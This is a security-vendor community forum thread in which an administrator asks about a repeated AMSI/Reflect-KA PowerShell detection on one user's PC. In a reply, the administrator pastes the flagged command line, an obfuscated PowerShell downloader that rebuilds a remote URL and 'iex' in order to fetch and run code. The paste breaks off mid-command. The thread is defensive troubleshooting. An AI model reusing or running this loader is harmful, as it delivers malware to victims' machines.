Advisory: Sophos Endpoint "Your connection isn't private" after reboot. Policy settings can be returned to normal. See: KB-000045954 for the latest updates.

This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

AMSI/Reflect-KA Detection

Hello everyone,

We get the following alert

What happened: We could not clean up a threat.

Where it happened: computer name

Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

What was detected: AMSI/Reflect-KA

How severe it is: High

What Sophos has done so far: We attempted to clean up a threat.

It is for only for one users, used to be two. I cleaned the temp files for both users on their respective PCs, and it seems that fixed the issue for the first user, or maybe just a coincidence.

However this one user's account on this PC keep giving us this detection.

Seems to be triggered by two different things, but they all lead to powershell.

Please see the images, hope that helps.

Any idea about this. Much appreciated.



This thread was automatically locked due to age.
Parents
  • Please click on Microsoft Powershell at the top of the chart and look at the window on the right to see what is the command line

  • Hello,

    Thanks for your response

    This is what I got

    "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Throug9 ([String]$Gastrocele){$Navigatr = 'su'+'bstring';For($Dakshe=1; $Dakshe -lt $Gastrocele.Length-1; $Dakshe+=(1+1)){$Traadethv=$Traadethv+$Gastrocele.$Navigatr.Invoke($Dakshe, 1)};$Traadethv;}$Reticu=Throug9 ' hRtftRpKs :S/ /Tl eBd sDhDeHe t m eKtCaYlu.DcKosm /TZ ZSZ /AETmEpAoCrMtTm .TiKnMfU ';$Traadethv01=Throug9 ' i e xD ';$Mlkevej = Throug9 ' \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ';.($Traadethv01) (Throug9 ' $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ') ;.($Traadethv01) (Throug9 'P$ M lTk eLvEe jD= $CTEahbNsOl iSs tUe 2R+K$ MSl kAeCvPeEjM ') ;.($Traadethv01) (Throug9 'B$ VBr gheNlFsBh eRdSsB M=O (D(OgSw mSiU w i nG3 2 _VpFrUoTcSe sPs B-aFS VPDr o cSeFsosNIIdK= $ { PDI D }a)T. CCoDm mVa n d LNi n eT)u - s p l ibtL K[Nc hSaQr ] 3f4 ');.($Traadethv01) (Throug9 's$FJPu dEiT t= F$ VKr g e l sSh eBdEsT[ $ VPrNg e lssVh eSd s . cCoGuOnFt -S2O] ');.($Traadethv01) (Throug9

    Many Thanks

Reply Children
No Data